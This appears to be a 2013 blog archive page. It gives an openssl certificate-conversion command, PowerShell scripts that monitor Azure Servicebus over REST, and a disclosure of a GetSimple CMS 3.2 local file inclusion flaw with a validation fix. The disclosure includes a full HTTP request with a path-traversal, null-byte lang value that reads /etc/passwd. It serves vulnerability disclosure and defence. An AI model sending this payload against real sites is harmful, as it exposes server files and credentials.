Archive for October, 2013

The place for things I find whilst learning about windows azure.


Convert apache style certificates – crt and key files to IIS compatible pfx certificates with private key using openssl

This has always been a bit of an irritating command for me – I find it then forget it and it takes ages to remember the right syntax to do it the next time I need it.

So here it is using openssl

 

openssl pkcs12 -export -in mycert.crt -inkey mycert.key -out mycert.pfx -certfile ca.crt

 

Bosh

Windows Azure servicebus queue and relay REST calls for monitoring

Whilst deploying a new application to Windows Azure Cloud Services, the components being used included both Servicebus relays and queues.

Traditional cloud or web services are relatively easy to monitor, usually with a web or API type call, but as Servicebus doesn’t have a directly callable endpoint as such, monitoring is a little more tricky.

Because it’s new, there currently isn’t much help on the web with regard to the REST API for Servicebus, especially if it’s secured using ACS, so I have knocked together some scripts using PowerShell. They call ACS for your authorization token, then present that in an HTTP REST call which gets, in the case of a Servicebus queue, the details of that queue (if there are messages in there) and, in the case of relays, the name and whether there are any listeners connected.

PowerShell script below for relays – it probably needs some tidying up but it does the main bits.

Add-Type -AssemblyName System.Web   # provides [System.Web.HttpUtility]

# POST the WRAP credentials to ACS and return the form-encoded response body
function Execute-HTTPPostCommand() {
    param(
        [string] $target = $null, [string] $Post
    )

    $url = $target
    $parameters = $Post # your POST parameters

    $http_request = New-Object -ComObject Msxml2.XMLHTTP
    $http_request.open('POST', $url, $false)
    $http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
    $http_request.setRequestHeader("Content-length", $parameters.length)
    $http_request.setRequestHeader("Connection", "close")
    $http_request.send($parameters)
    # Write-Host keeps the status text out of the function's return value
    Write-Host $http_request.statusText

    $results = $http_request.ResponseText
    return $results
}

# GET a Servicebus management URL, presenting the ACS token in a WRAP Authorization header
function Execute-HTTPGetCommand() {
    param(
        [string] $target = $null, [string] $authstring
    )

    # ACS answers wrap_access_token=<url-encoded token>&wrap_access_token_expires_in=<seconds>
    $authnew = $authstring.Split("=", 2)

    #Write-Host "authnew",$authnew[1]
    $authnospace = $authnew[1]
    $strippedauth = $authnospace -replace ' ', ''

    $encmsg = [System.Web.HttpUtility]::UrlDecode($strippedauth)

    # Debug output: this prints the access token to the console
    write-host $encmsg
    # Drop the trailing expiry field, whatever its value
    $encmsg2 = $encmsg -replace '&wrap_access_token_expires_in=\d+', ''

    write-host $encmsg2

    $authfull = "WRAP access_token=`"" + $encmsg2 + "`""
    $url = $target

    $http_request = New-Object -ComObject Msxml2.XMLHTTP
    $http_request.open('GET', $url, $false)

    $http_request.setRequestHeader("Authorization", $authfull)
    $http_request.setRequestHeader("Connection", "close")
    # A GET carries no body, so nothing is passed to send()
    $http_request.send()
    Write-Host $http_request.statusText

    $results = $http_request.ResponseText
    return $results
}

$post = "wrap_name=owner&wrap_password=[URIEncodedpassword]&wrap_scope=http%3A%2F%2F[namespace].servicebus.windows.net"
$URL = "https://[namespace]-sb.accesscontrol.windows.net/WRAPv0.9/"

$authstring = Execute-HTTPPostCommand $URL $post

$URL2 = "https://[namespace].servicebus.windows.net/`$Resources/Relays"

Execute-HTTPGetCommand $URL2 $authstring

 

PowerShell script for querying Servicebus queues – this returns the queues whose message count is greater than 0

Add-Type -AssemblyName System.Web   # provides [System.Web.HttpUtility]

# POST the WRAP credentials to ACS and return the form-encoded response body
function Execute-HTTPPostCommand() {
    param(
        [string] $target = $null, [string] $Post
    )

    $url = $target
    $parameters = $Post # your POST parameters

    $http_request = New-Object -ComObject Msxml2.XMLHTTP
    $http_request.open('POST', $url, $false)
    $http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
    $http_request.setRequestHeader("Content-length", $parameters.length)
    $http_request.setRequestHeader("Connection", "close")
    $http_request.send($parameters)
    # Write-Host keeps the status text out of the function's return value
    Write-Host $http_request.statusText

    $results = $http_request.ResponseText
    return $results
}

# GET a Servicebus management URL, presenting the ACS token in a WRAP Authorization header
function Execute-HTTPGetCommand() {
    param(
        [string] $target = $null, [string] $authstring
    )

    # ACS answers wrap_access_token=<url-encoded token>&wrap_access_token_expires_in=<seconds>
    $authnew = $authstring.Split("=", 2)

    #Write-Host "authnew",$authnew[1]
    $authnospace = $authnew[1]
    $strippedauth = $authnospace -replace ' ', ''

    $encmsg = [System.Web.HttpUtility]::UrlDecode($strippedauth)

    # Debug output: this prints the access token to the console
    write-host $encmsg
    # Drop the trailing expiry field, whatever its value
    $encmsg2 = $encmsg -replace '&wrap_access_token_expires_in=\d+', ''

    write-host $encmsg2

    $authfull = "WRAP access_token=`"" + $encmsg2 + "`""
    $url = $target

    $http_request = New-Object -ComObject Msxml2.XMLHTTP
    $http_request.open('GET', $url, $false)

    $http_request.setRequestHeader("Authorization", $authfull)
    $http_request.setRequestHeader("Connection", "close")
    # A GET carries no body, so nothing is passed to send()
    $http_request.send()
    Write-Host $http_request.statusText

    $results = $http_request.ResponseText
    return $results
}

$post = "wrap_name=owner&wrap_password=[URIEncodedpassword]&wrap_scope=http%3A%2F%2F[namespace].servicebus.windows.net"
$URL = "https://[namespace]-sb.accesscontrol.windows.net/WRAPv0.9/"

$authstring = Execute-HTTPPostCommand $URL $post

$URL2 = "https://[namespace].servicebus.windows.net/`$Resources/Queues?`$filter=MessageCount%20Gt%200"

Execute-HTTPGetCommand $URL2 $authstring

 

GetSimple CMS 3.2 LFI exploit

Following on from my series of GetSimple CMS articles, this one details an LFI (local file inclusion) vulnerability which is present in the current and current beta versions – 3.2beta.

As per the previous article this requires you to be logged in as a valid user.

The code at fault is in the settings.php page, in the handling of the language parameter; I have listed the section below:

if(isset($_POST['lang'])) {
$LANG = $_POST['lang'];

Then it’s used here:
include(GSLANGPATH.$LANG.'.php');

So, for example, if you post the following request you will get the /etc/passwd file. Given that these days it contains no passwords, that is probably the least of your worries; an attacker would more likely be after other files with credentials in them. The trailing %00 in the lang value is a null byte, there to cut off the .php suffix that the include appends.

POST /admin/settings.php HTTP/1.1
Host: getsimplecmshost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://getsimplecmshost/admin/settings.php
Cookie: validcookie
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315

nonce=validnonce&sitename=GetSimpleCMSSite&siteurl=http%3A%2F%2Fgetsimplehost%2F&permalink=&user=admin&email=admin@domainname&timezone=Europe%2FLondon&lang=../../../../../../../../etc/passwd%00&show_htmleditor=1&sitepwd=&sitepwd_confirm=&submitted=Save+Settings

As I’ve mentioned in previous articles, whilst this requires a valid user, it’s not acceptable that even an authenticated user can read files off the local file system – especially in the case of hosted systems.

In extreme circumstances this LFI can also lead to complete server compromise using a technique where php code is injected into files which are readable by the web process and subsequently included in the above request and executed.

Again, simple user input validation would completely mitigate this attack.
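
The input validation the post calls for could look like the following. This is an added example, not GetSimple's code or a patch from the author: `resolve_lang()`, the locale-style file naming and the `en_US` fallback are assumptions, and `GSLANGPATH` is the constant from the snippet above.

```php
<?php
// Added example (not GetSimple code). resolve_lang() and the en_US fallback
// are hypothetical; the locale-style file naming is an assumption.
function resolve_lang($requested, string $langDir, string $fallback = 'en_US'): string
{
    // 1. Shape check: strings in locale form only (en_US, de_DE). This rejects
    //    arrays, '/', '.', NUL bytes and everything else a traversal needs.
    if (!is_string($requested) || !preg_match('/\A[a-z]{2,3}_[A-Z]{2}\z/', $requested)) {
        return $fallback;
    }
    // 2. Allowlist: the name must be one of the language files on disk.
    $available = array_map(
        fn($f) => basename($f, '.php'),
        glob(rtrim($langDir, '/') . '/*.php') ?: []
    );
    if (!in_array($requested, $available, true)) {
        return $fallback;
    }
    // 3. Containment: the resolved file must sit inside the language directory.
    $base = realpath($langDir);
    $file = realpath($langDir . '/' . $requested . '.php');
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $fallback;
    }
    return $requested;
}

// Constructed demo: a throwaway language directory and sample inputs.
$dir = sys_get_temp_dir() . '/gs_lang_demo_' . getmypid();
mkdir($dir);
foreach (['en_US', 'de_DE'] as $l) {
    file_put_contents("$dir/$l.php", '<?php $i18n = array();');
}
$samples = ['de_DE', 'fr_FR', '../en_US', 'en_US.php', ['x'], "../../../../etc/passwd\0"];
foreach ($samples as $in) {
    printf("%-34s => %s\n", json_encode($in), resolve_lang($in, $dir));
}
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);

// In settings.php the two lines from the post would then read:
//   $LANG = resolve_lang($_POST['lang'] ?? '', GSLANGPATH);
//   include GSLANGPATH . $LANG . '.php';
```

Only `de_DE` comes back unchanged; every other sample, including the traversal string from the request above, resolves to the fallback.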